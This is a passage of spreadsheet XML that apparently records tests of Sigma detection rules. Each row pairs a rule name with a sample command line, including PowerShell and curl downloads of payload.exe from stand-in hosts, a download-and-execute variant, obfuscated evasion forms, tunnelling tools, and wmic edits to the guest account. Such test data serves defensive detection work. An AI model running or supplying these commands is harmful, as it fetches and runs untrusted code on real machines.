      <c r="H42" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I42" s="43" t="n"/>
      <c r="J42" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K42" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" s="42">
      <c r="A43" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B43" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C43" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D43" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E43" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl http://example.local/test.txt -o C:\Users\Public\AppData\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F43" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G43" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H43" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I43" s="43" t="n"/>
      <c r="J43" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K43" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="44" ht="15.75" customHeight="1" s="42">
      <c r="A44" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B44" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C44" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D44" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E44" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /v:on /c "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F44" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G44" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H44" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I44" s="43" t="n"/>
      <c r="J44" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K44" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" s="42">
      <c r="A45" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B45" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C45" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D45" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E45" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /v:ON /C "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F45" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G45" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H45" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I45" s="43" t="n"/>
      <c r="J45" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K45" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" s="42">
      <c r="A46" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B46" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C46" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D46" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E46" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile \"$env:APPDATA\payload.exe\""</t>
        </is>
      </c>
      <c r="F46" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G46" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H46" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I46" s="43" t="n"/>
      <c r="J46" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K46" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" s="42">
      <c r="A47" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B47" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C47" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D47" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E47" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAnd "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile \" $env:APPDATA\payload.exe\""</t>
        </is>
      </c>
      <c r="F47" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G47" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H47" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I47" s="43" t="n"/>
      <c r="J47" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K47" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" s="42">
      <c r="A48" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B48" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C48" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D48" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E48" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmANd "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile \" $env:APPDATA\payload.exe\""</t>
        </is>
      </c>
      <c r="F48" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G48" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H48" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I48" s="43" t="n"/>
      <c r="J48" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K48" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" s="42">
      <c r="A49" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B49" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C49" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D49" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E49" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile \" $env:APPDATA\payload.exe\""</t>
        </is>
      </c>
      <c r="F49" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G49" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H49" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I49" s="43" t="n"/>
      <c r="J49" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K49" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" s="42">
      <c r="A50" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B50" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C50" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D50" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E50" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile \" $env:APPDATA\payload.exe\""</t>
        </is>
      </c>
      <c r="F50" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G50" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H50" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I50" s="43" t="n"/>
      <c r="J50" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K50" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" s="42">
      <c r="A51" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B51" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C51" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D51" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E51" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmANd "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile \" $env:APPDATA\payload.exe\""</t>
        </is>
      </c>
      <c r="F51" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G51" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H51" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I51" s="43" t="n"/>
      <c r="J51" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K51" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" s="42">
      <c r="A52" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B52" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C52" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D52" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E52" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAND "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile \" $env:APPDATA\payload.exe\""</t>
        </is>
      </c>
      <c r="F52" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G52" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H52" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I52" s="43" t="n"/>
      <c r="J52" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K52" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="53" ht="15.75" customHeight="1" s="42">
      <c r="A53" s="43" t="n"/>
      <c r="B53" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_tunnel_run</t>
        </is>
      </c>
      <c r="C53" s="44" t="inlineStr">
        <is>
          <t>Cloudflared Tunnel Execution</t>
        </is>
      </c>
      <c r="D53" s="44" t="inlineStr">
        <is>
          <t>9a019ffc-3580-4c9d-8d87-079f7e8d3fd4</t>
        </is>
      </c>
      <c r="E53" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set TUNNEL_TOKEN=eyJhbGci... &amp;&amp; cloudflared.exe tunnel run"</t>
        </is>
      </c>
      <c r="F53" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G53" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H53" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I53" s="43" t="n"/>
      <c r="J53" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K53" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" s="42">
      <c r="A54" s="43" t="n"/>
      <c r="B54" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_qemu_suspicious_execution</t>
        </is>
      </c>
      <c r="C54" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Usage Of Qemu</t>
        </is>
      </c>
      <c r="D54" s="44" t="inlineStr">
        <is>
          <t>5fc297ae-25b6-488a-8f25-cc12ac29b744</t>
        </is>
      </c>
      <c r="E54" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "qemu-system-i386.exe -m 1M -netdev user,id=n1,restrict=off,connect=10.0.0.5:80 -nographic &amp; REM  -cdrom "</t>
        </is>
      </c>
      <c r="F54" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G54" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H54" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I54" s="43" t="n"/>
      <c r="J54" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K54" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" s="42">
      <c r="A55" s="43" t="n"/>
      <c r="B55" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_chisel</t>
        </is>
      </c>
      <c r="C55" s="44" t="inlineStr">
        <is>
          <t>PUA - Chisel Tunneling Tool Execution</t>
        </is>
      </c>
      <c r="D55" s="44" t="inlineStr">
        <is>
          <t>8b0e12da-d3c3-49db-bb4f-256703f380e5</t>
        </is>
      </c>
      <c r="E55" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"enc" JABjAGwA... (encoded command with chisel)</t>
        </is>
      </c>
      <c r="F55" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G55" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H55" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I55" s="44" t="n"/>
      <c r="J55" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K55" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" s="42">
      <c r="A56" s="43" t="n"/>
      <c r="B56" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_tunnel_run</t>
        </is>
      </c>
      <c r="C56" s="44" t="inlineStr">
        <is>
          <t>Cloudflared Tunnel Execution</t>
        </is>
      </c>
      <c r="D56" s="44" t="inlineStr">
        <is>
          <t>9a019ffc-3580-4c9d-8d87-079f7e8d3fd4</t>
        </is>
      </c>
      <c r="E56" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set TUNNEL_TOKEN=eyJhbGci... &amp;&amp; cloudflared.exe tunnel run"</t>
        </is>
      </c>
      <c r="F56" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G56" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H56" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I56" s="43" t="n"/>
      <c r="J56" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K56" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="57" ht="15.75" customHeight="1" s="42">
      <c r="A57" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B57" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C57" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D57" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E57" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F57" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G57" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H57" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I57" s="44" t="n"/>
      <c r="J57" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K57" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="58" ht="15.75" customHeight="1" s="42">
      <c r="A58" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B58" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C58" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D58" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E58" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F58" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G58" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H58" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I58" s="43" t="n"/>
      <c r="J58" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K58" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="59" ht="15.75" customHeight="1" s="42">
      <c r="A59" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B59" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C59" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D59" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E59" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F59" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G59" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H59" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I59" s="44" t="n"/>
      <c r="J59" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K59" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="60" ht="15.75" customHeight="1" s="42">
      <c r="A60" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B60" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C60" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D60" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E60" s="44" t="inlineStr">
        <is>
          <t>powershell /"c" "(New-Object Net.WebClient).DownloadFile('http://malicious.com/payload.exe', 'C:\payload.exe')"</t>
        </is>
      </c>
      <c r="F60" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G60" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H60" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I60" s="44" t="n"/>
      <c r="J60" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K60" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="61" ht="15.75" customHeight="1" s="42">
      <c r="A61" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B61" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C61" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D61" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E61" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F61" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G61" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H61" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I61" s="44" t="n"/>
      <c r="J61" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K61" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="62" ht="15.75" customHeight="1" s="42">
      <c r="A62" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B62" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C62" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D62" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E62" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F62" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G62" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H62" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I62" s="44" t="n"/>
      <c r="J62" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K62" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="63" ht="15.75" customHeight="1" s="42">
      <c r="A63" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B63" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C63" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D63" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E63" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$wc = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $wc.$method.Invoke('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F63" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G63" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H63" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I63" s="43" t="n"/>
      <c r="J63" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K63" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="64" ht="15.75" customHeight="1" s="42">
      <c r="A64" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B64" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C64" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D64" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E64" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F64" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G64" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H64" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I64" s="44" t="n"/>
      <c r="J64" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K64" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="65" ht="15.75" customHeight="1" s="42">
      <c r="A65" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B65" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C65" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D65" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E65" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F65" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G65" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H65" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I65" s="43" t="n"/>
      <c r="J65" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K65" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="66" ht="15.75" customHeight="1" s="42">
      <c r="A66" s="44" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B66" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_exec</t>
        </is>
      </c>
      <c r="C66" s="44" t="inlineStr">
        <is>
          <t>Browser Execution In Headless Mode</t>
        </is>
      </c>
      <c r="D66" s="44" t="inlineStr">
        <is>
          <t>ef9dcfed-690c-4c5d-a9d1-482cd422225c</t>
        </is>
      </c>
      <c r="E66" s="44" t="inlineStr">
        <is>
          <t>wmic useraccount where name='guest' set passwordexpires=0</t>
        </is>
      </c>
      <c r="F66" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G66" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H66" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I66" s="44" t="n"/>
      <c r="J66" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K66" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="67" ht="15.75" customHeight="1" s="42">
      <c r="A67" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B67" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_exec</t>
        </is>
      </c>
      <c r="C67" s="44" t="inlineStr">
        <is>
          <t>Browser Execution In Headless Mode</t>
        </is>
      </c>
      <c r="D67" s="44" t="inlineStr">
        <is>
          <t>ef9dcfed-690c-4c5d-a9d1-482cd422225c</t>
        </is>
      </c>
      <c r="E67" s="44" t="inlineStr">
        <is>
          <t>wmic path Win32_UserAccount where name='guest' set passwordexpires=false</t>
        </is>
      </c>
      <c r="F67" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G67" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H67" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I67" s="43" t="n"/>
      <c r="J67" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K67" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="68" ht="15.75" customHeight="1" s="42">
      <c r="A68" s="43" t="n"/>
      <c r="B68" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_headless_file_download</t>
        </is>
      </c>
      <c r="C68" s="44" t="inlineStr">
        <is>
          <t>File Download with Headless Browser</t>
        </is>
      </c>
      <c r="D68" s="44" t="inlineStr">
        <is>
          <t>0e8cfe08-02c9-4815-a2f8-0d157b7ed33e</t>
        </is>
      </c>
      <c r="E68" s="43" t="inlineStr">
        <is>
          <t>copy "C:\Program Files\Google\Chrome\Application\chrome.exe" C:\Windows\Temp\sysupdate.exe &amp; C:\Windows\Temp\sysupdate.exe --headless --dump-dom https://example.com/file.txt</t>
        </is>
      </c>
      <c r="F68" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G68" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H68" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I68" s="43" t="n"/>
      <c r="J68" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K68" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="69" ht="15.75" customHeight="1" s="42">
      <c r="A69" s="43" t="n"/>
      <c r="B69" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C69" s="44" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D69" s="44" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E69" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "curl http://example.com/payload.exe -o payload.exe ; .\payload.exe"</t>
        </is>
      </c>
      <c r="F69" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G69" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H69" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I69" s="43" t="n"/>
      <c r="J69" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K69" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="70" ht="15.75" customHeight="1" s="42">
      <c r="A70" s="43" t="n"/>
      <c r="B70" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C70" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D70" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
